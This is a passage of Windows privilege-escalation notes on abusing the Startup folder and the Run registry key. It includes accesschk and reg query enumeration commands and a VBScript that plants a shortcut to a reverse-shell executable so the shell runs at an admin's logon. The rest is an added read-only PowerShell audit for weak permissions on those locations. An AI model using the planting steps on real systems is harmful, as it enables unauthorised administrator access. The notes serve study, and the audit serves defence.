Startup Apps / Autorun

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  • C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    • If we have write access to the directory, we can add a reverseShell.exe; when an admin logs in, we get a reverse shell with admin privileges.
  • Check access to the directory with accesschk.exe:

    • accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
  • Files in the StartUp directory must be shortcuts (.lnk).

VBScript to create a shortcut file
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

Run the script from cmd:
cscript CreateShortCut.vbs

Enumerate Auto Run Programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Check for write permissions on the file each entry points to:
accesschk.exe /accepteula -quvw <user> "<path to autorun executable>"
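
A read-only audit of the same locations, as an added example that is not part of the original notes: it lists Allow ACEs that grant write-type rights to principals other than SYSTEM, Administrators and TrustedInstaller on the all-users Startup folder, the targets of its shortcuts, and the executables named in the HKLM Run key. The function names and the trusted-SID list are assumptions of this example.

```powershell
# Added example (not from the original notes): list ACL entries that grant
# write access on the autorun locations above to non-administrative principals.

# WriteData/CreateFiles, AppendData, Delete, ChangePermissions, TakeOwnership,
# plus GENERIC_WRITE and GENERIC_ALL, which some inherited ACEs store raw.
$WriteBits = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000
# Assumed trusted writers: SYSTEM, Administrators, TrustedInstaller.
$Trusted = 'S-1-5-18', 'S-1-5-32-544',
           'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'

function Get-WeakAce {
    param([string]$Path, [string]$Source)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -ne 'Allow' -or $Trusted -contains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $WriteBits) -eq 0) { continue }
        [pscustomobject]@{ Source = $Source; Path = $Path; Sid = $sid; Rights = $ace.FileSystemRights }
    }
}

function Get-ExePath {
    # Extract the executable from a Run value such as '"C:\a b\x.exe" /arg'.
    param([string]$CommandLine)
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine)
    if ($expanded -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($expanded -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
}

function Get-AutorunWeakAce {
    # 1. All-users Startup folder and the targets of the shortcuts in it.
    $startup = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp'
    Get-WeakAce -Path $startup -Source 'Startup folder'
    $shell = New-Object -ComObject WScript.Shell
    foreach ($lnk in Get-ChildItem -LiteralPath $startup -Filter *.lnk -ErrorAction SilentlyContinue) {
        $target = $shell.CreateShortcut($lnk.FullName).TargetPath
        if ($target) { Get-WeakAce -Path $target -Source "Shortcut: $($lnk.Name)" }
    }
    # 2. Executables referenced by the machine-wide Run key.
    $run = Get-Item -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    foreach ($name in $run.GetValueNames()) {
        $exe = Get-ExePath ([string]$run.GetValue($name))
        if ($exe) { Get-WeakAce -Path $exe -Source "Run value: $name" }
    }
}

Get-AutorunWeakAce | Format-Table -AutoSize
```

Any row returned names a SID that can modify something an administrator's logon will execute; the fix is to remove that ACE so only administrative principals can write there.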